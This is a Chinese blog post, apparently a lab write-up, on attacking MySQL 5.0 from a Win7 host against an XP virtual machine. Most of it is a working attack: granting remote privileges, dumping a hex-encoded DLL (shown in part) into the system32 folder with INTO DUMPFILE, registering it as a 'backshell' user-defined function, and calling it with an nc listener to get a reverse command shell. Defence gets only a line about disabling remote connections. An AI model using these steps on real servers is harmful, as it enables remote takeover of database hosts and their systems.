mysql5.0入侵測試以及防范方法分享
在做了之前的SQL SERVER之后,便很想嘗試一下MYSQL的入侵測試已經防范,與大家一起分享。
總的來說,我一直在用的是MYSQL,對MYSQL比較熟悉,相比較而言,感覺MYSQL更安全,這只是我自己胡亂猜想的,希望不要引起什么爭論神馬的。。。一本饅頭引發(fā)的血案。。。
正題之一
物理機:Win7
虛擬機:XP
給予mysql遠程權限:
grant all privileges on *.* to 數(shù)據(jù)庫賬號@給予權限的IP identified by '數(shù)據(jù)庫密碼';
flush privileges;
給物理機遠程權限:
物理機成功連接上:
執(zhí)行侵入測試前(有圖有真相):
執(zhí)行侵入測試后(有圖有真相):
重啟前(有圖有真相):
重啟后(有圖有真相):
正題之二:
遠程登錄之后寫入代碼,代碼在yyd.txt當中,然后在MySql中寫入文件:
Win7 打另外一個cmd,本地端口映射:nc -vv -l -p 端口號
虛擬機上:執(zhí)行映射:select backshell("物理機IP",端口號);
這便執(zhí)行了3306端口反彈CMD
(沒圖了。。。用到了一個nc軟件執(zhí)行的映射)
yyd.txt大概內容:
et @a=concat('',
0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部分代碼...............0736875745f6465696e697400736875745f696e697400);
create table yyd(data LONGBLOB);
insert into yyd values("");updateyyd set data = @a;
select data from yyd into DUMPFILE 'c:\\windows\\system32\\yyd.dll';
CREATE FUNCTION backshell RETURNS STRING SONAME 'yyd.dll';
正題之三:
防范
感覺有點亂,主要是分享了兩種方法入侵,但是防范那部分應該是XP上的MySql服務關閉,但是早XP上做了好多測試,左后XP被我弄掛掉了。。。。好丟臉,只好把Win7上的MySql服務拿出來了。
覺得主要還是遠程連接的問題,“如果MySql不開啟遠程連接的話我們還是朋友”,開玩笑,如果MySql不開啟遠程連接的話入侵幾率會小的很多。
相關文章
MySQL數(shù)據(jù)庫遠程訪問權限如何打開(兩種方法)
本文通過兩種方法給大家介紹MySQL數(shù)據(jù)庫遠程訪問權限的打開方法,非常不錯,實用性非常高,感興趣的朋友一起看看吧2016-05-05MySQL SUM()帶條件的求和方法與多條件的求和方法解讀
這篇文章主要介紹了MySQL SUM()帶條件的求和方法與多條件的求和方法,具有很好的參考價值,希望對大家有所幫助。如有錯誤或未考慮完全的地方,望不吝賜教2023-05-05